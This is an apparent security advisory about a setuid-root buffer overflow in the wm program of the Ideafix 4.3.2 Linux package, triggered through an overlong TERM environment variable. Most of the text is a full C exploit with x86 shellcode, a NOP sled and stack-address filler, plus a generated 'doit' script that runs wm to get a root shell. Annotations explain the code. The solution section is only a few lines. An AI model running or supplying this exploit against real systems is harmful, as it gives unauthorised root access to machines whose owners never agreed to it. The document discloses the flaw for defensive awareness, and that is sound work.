COMMAND

    /usr/local/inter-soft/ideafix-4.3.2/bin/wm (Ideafix package)

SYSTEMS AFFECTED

    Linux

PROBLEM

    Bisti posted the following.  A vulnerability exists in  the package
    Ideafix  distributed  with  several  versions  of  Linux.  You  may
    obtain it from:

        ftp://sunsite.unc.edu/pub/Linux/devel/ideafix
        ftp://ftp.inter-soft.com/pub/ideafix

    This is a very popular development environment (e.g. in Argentina).
    Due  to  the  lack  of  proper  bounds checking in the setuid root
    program wm, the environment variable TERM is copied into  a  local
    fixed-size buffer, and the result is, you guessed it, a shell with
    euid=0.  Exploit follows:

    /*
     * 'Ideafix wm' Exploit 4 Linux.
     */

    #include <stdio.h>
    #include <stdlib.h>

    #define TERMSIZE        2000
    #define HUEVOSIZE       5000

    /*
     * Payload bytes used by the exploit below.  Treated here as an opaque
     * byte string; the only readable part is the trailing "/bin/sh".
     * strlen(shell) is used later to size the copy, so the array must not
     * contain an embedded NUL before its end.
     */
    char *shell =
       "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
       "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
       "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

    /*
     * Return the current stack pointer.
     *
     * The inline asm copies %esp into %eax and the function then falls off
     * its end without a return statement.  The caller receiving the value
     * depends on the return-value-in-%eax convention and on the compiler
     * not touching %eax afterwards; in standard C, using the result of a
     * non-void function that has no return is undefined behavior.  The
     * register names make this 32-bit x86 only.
     */
    long
    esp(void)
    {
    __asm__("movl %esp,%eax\n");  /* no return: value is whatever is left in %eax */
    }

    /*
     * Exploit driver as published in the advisory.
     *
     * Builds two environment strings and hands them to putenv():
     *   BOF=...  TERMSIZE bytes, filled with copies of the value esp()
     *            returned; the generated script exports this as TERM.
     *   EGG=...  HUEVOSIZE bytes: 0x90 filler followed by the bytes of
     *            `shell`.
     * It then appends a shell script named "doit" in the current directory
     * and runs it with system().
     *
     * Note: strlen() and memcpy() are called without <string.h>, so they
     * are implicitly declared under the includes above.  main() has no
     * return statement; falling off the end of main yields 0 in C99+.
     */
    int
    main(void)
    {

        char *ptr, *bof, *egg;
        long *addr_ptr, addr;
        int i;


        /* bof becomes the "BOF=" environment string; never freed (putenv keeps it). */
        if ( !(bof = malloc(TERMSIZE)) ) {
          printf("NoMoreMemory4bof.\n");
          exit(1);
        }

        /* egg becomes the "EGG=" environment string; never freed (putenv keeps it). */
        if ( !(egg = malloc(HUEVOSIZE)) ) {
          printf("NoMoreMemory4egg.\n");
          exit(1);
        }

        /* A stack address sampled from this process (see esp() above). */
        addr = esp();

        /*
         * Fill bof with addr, stepping 4 bytes per iteration while writing
         * one long per iteration: this only stays within TERMSIZE bytes when
         * sizeof(long) == 4.  With an 8-byte long it writes 2*TERMSIZE bytes
         * past the allocation's intended size.
         */
        addr_ptr = (long *) bof;
        for (i = 0; i < TERMSIZE; i += 4)
        *(addr_ptr++) = addr;

        /*
         * Fill egg: HUEVOSIZE - strlen(shell) - 1 bytes of 0x90, then the
         * strlen(shell) bytes of shell, leaving exactly one byte for the NUL
         * written below.  `i` is a signed int compared against a size_t
         * expression here (signed/unsigned comparison).
         */
        ptr = egg;
        for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
            *(ptr++) = 0x90;

        for( i = 0; i < strlen(shell); i++)
            *(ptr++) = shell[i];


        /* NUL-terminate both strings so putenv()/the shell see bounded strings. */
        bof[TERMSIZE - 1] = '\0';
        egg[HUEVOSIZE - 1] = '\0';

        /* Overwrite the first four bytes of each buffer with the variable name prefix. */
        memcpy(bof, "BOF=", 4);
        memcpy(egg , "EGG=", 4);

        /* The buffers themselves become part of the environment from here on. */
        putenv(bof);
        putenv(egg);

        /*
         * Generate the helper script "doit" in the current directory, one
         * line per system() call, appending (>>) to any existing file.
         */
        system("echo '#!/bin/sh' >> doit");
        system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
        system("echo 'and run the vulnerable program.' >> doit");
        system("echo '# Bisti [111097]' >> doit");
        system("echo 'killall wm' >> doit");
        system("echo 'TERM=$BOF;export TERM' >> doit");
        system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");

        /* Run the generated script; the environment set above is inherited. */
        system("sh ./doit");

    }

SOLUTION

    Surely a new release will fix this (the exploited version is 4.3.2).
    I'm not sure what wm really does as I don't have this package,  but
    if everything else still functions without wm having the suid  bit,
    then you know what you gotta do.